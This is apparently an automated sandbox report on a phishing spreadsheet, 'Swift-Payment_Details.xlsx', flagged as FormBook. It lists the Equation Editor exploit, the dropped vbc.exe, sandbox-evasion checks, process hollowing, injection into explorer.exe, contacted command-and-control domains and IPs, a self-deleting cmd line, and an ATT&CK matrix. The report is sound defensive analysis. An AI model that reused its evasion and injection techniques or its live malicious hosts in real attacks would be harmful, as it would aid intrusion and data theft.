          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Swift-Payment_Details.xlsx | Stream path 'EncryptedPackage' entropy: 7.99889031885 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 00000000000785F4 second address: 00000000000785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 552 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 2632 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe | Last function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2170546852.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2187992408.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_002606DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_002608EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_002609DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0026099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00260A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_009726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_024426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exe | Network Connect: 173.255.194.134 80
          Source: C:\Windows\explorer.exe | Domain query: www.envisionfordheights.com
          Source: C:\Windows\explorer.exe | Domain query: www.theshapecreator.com
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Domain query: www.melodezu.com
          Source: C:\Windows\explorer.exe | Network Connect: 64.227.87.162 80
          Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.194 80
          Source: C:\Windows\explorer.exe | Domain query: www.scuolatua.com
          Source: C:\Windows\explorer.exe | Domain query: www.anthonysavillemiddleschool.com
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 140000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

(One column per tactic; the number after a technique name is the report's count of matching signatures.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 31 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Extra Window Memory Injection 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Behavior Graph

Behavior Graph ID: 452647 | Sample: Swift-Payment_Details.xlsx | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100

Nodes and edges recovered from the graph text (the number after a process name is the graph's created registry value / created file count label):

Sample: Swift-Payment_Details.xlsx (root node)
• DNS/IP: www.sprinkleresources.com; sprinkleresources.com
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
• Started: EQNEDT32.EXE 12; EXCEL.EXE 34 30

EQNEDT32.EXE 12
• DNS/IP: 192.210.173.40, 49167, 80 AS-COLOCROSSINGUS United States
• Dropped: C:\Users\user\AppData\...\loader1[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
• Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
• Started: vbc.exe

EXCEL.EXE 34 30
• Dropped: C:\Users\...\~$Swift-Payment_Details.xlsx (data)

vbc.exe (first instance, started by EQNEDT32.EXE)
• Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• Started: vbc.exe (second instance)

vbc.exe (second instance)
• Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• Injected: explorer.exe

explorer.exe (injected)
• DNS/IP: www.theshapecreator.com 217.160.0.194, 49172, 80 ONEANDONE-ASBrauerstrasse48DE Germany; www.anthonysavillemiddleschool.com 173.255.194.134, 49168, 80 LINODE-APLinodeLLCUS United States; 5 other IPs or domains
• Signature: System process connects to network (likely due to code injection or exploit)
• Started: wscript.exe

wscript.exe
• Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• Started: cmd.exe

cmd.exe

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Swift-Payment_Details.xlsx | 28% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
9.2.wscript.exe.2ac7960.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
9.2.wscript.exe.642310.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.2.vbc.exe.230000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.2.vbc.exe.270000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.theshapecreator.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.google.com.br/ | 0% | Avira URL Cloud | safe
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.google.com.tw/ | 0% | Avira URL Cloud | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
www.extinctionbrews.com/dy8g/ | 0% | Avira URL Cloud | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe
http://buscador.terra.es/ | 0% | URL Reputation | safe
http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
http://www.iask.com/ | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
http://p.zhongsou.com/favicon.ico | 0% | URL Reputation | safe
http://service2.bfast.com/ | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sprinkleresources.com | 78.47.57.7 | true | true | | unknown
envisionfordheights.com | 184.168.131.241 | true | true | | unknown
www.theshapecreator.com | 217.160.0.194 | true | true | | unknown
www.scuolatua.com | 62.149.128.40 | true | true | | unknown
melodezu.com | 64.227.87.162 | true | true | | unknown
www.anthonysavillemiddleschool.com | 173.255.194.134 | true | true | | unknown
www.melodezu.com | unknown | unknown | true | | unknown
www.sprinkleresources.com | unknown | unknown | true | | unknown
www.envisionfordheights.com | unknown | unknown | true | | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.google.com.br/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.chol.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.de/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mtv.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.dailymail.co.uk/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ya.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://asp.usatoday.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://fr.search.yahoo.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://rover.ebay.com | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://in.search.yahoo.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ebay.in/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://%s.com | explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
http://msk.afisha.ru/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.google.com.tw/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.rediff.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.windows.com/pctv. | explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp | false | | high
http://www.ya.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.naver.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.ru/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.daum.net/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.naver.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.clarin.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ozu.es/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://kr.search.yahoo.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.about.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.ask.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.priceminister.com/favicon.ico | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.cjmall.com/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://suche.t-online.de/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.it/ | explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp | false | |
                                                                                            high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.amazon.de/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2178982212.00000000085C0000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
